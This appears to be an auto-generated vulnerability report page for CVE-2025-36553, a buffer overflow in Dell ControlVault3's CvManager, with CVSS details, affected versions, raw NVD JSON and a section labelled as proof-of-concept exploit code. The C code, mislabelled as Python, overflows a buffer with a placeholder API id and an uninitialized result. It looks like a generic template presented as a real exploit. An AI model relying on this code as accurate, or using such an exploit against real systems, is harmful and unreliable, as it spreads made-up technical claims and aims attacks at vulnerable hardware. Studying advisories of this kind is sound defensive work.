Security Vulnerability Report
中文
CVE-2025-36553 CVSS 8.8 HIGH

CVE-2025-36553

Published: 2025-11-17 23:15:54
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A buffer overflow vulnerability exists in the CvManager functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Dell ControlVault3 < 5.15.14.19
Dell ControlVault3 Plus < 6.2.36.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-36553 PoC - Dell ControlVault3 Buffer Overflow // Target: Dell ControlVault3 CvManager // CVSS: 8.8 (High) #include <windows.h> #include <stdio.h> // ControlVault API definitions #define CV_API_TRIGGER_VULN 0x12345678 typedef struct { DWORD api_id; DWORD input_length; PVOID input_data; DWORD output_length; PVOID output_data; } CV_API_REQUEST; // Trigger buffer overflow in CvManager BOOL trigger_cve_2025_36553(HMODULE hVault) { CV_API_REQUEST request; DWORD result; // Prepare oversized input to trigger overflow DWORD payload_size = 0x10000; // 64KB - exceeds buffer limit BYTE* payload = (BYTE*)malloc(payload_size); if (!payload) return FALSE; // Fill payload with controlled data memset(payload, 0x41, payload_size); // Craft API request request.api_id = CV_API_TRIGGER_VULN; request.input_length = payload_size; request.input_data = payload; request.output_length = 0x100; request.output_data = malloc(0x100); // Get CvManager function pointer typedef DWORD (*CvManager_Call)(CV_API_REQUEST*); CvManager_Call CvCall = (CvManager_Call)GetProcAddress(hVault, "CvManagerCall"); if (CvCall) { // Trigger vulnerability result = CvCall(&request); } free(payload); free(request.output_data); return (result == 0); } int main() { HMODULE hVault = LoadLibrary("CvManager.dll"); if (hVault) { trigger_cve_2025_36553(hVault); FreeLibrary(hVault); } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36553", "sourceIdentifier": "[email protected]", "published": "2025-11-17T23:15:54.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow vulnerability exists in the CvManager functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2189", "source": "[email protected]"}, {"url": "https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2189", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.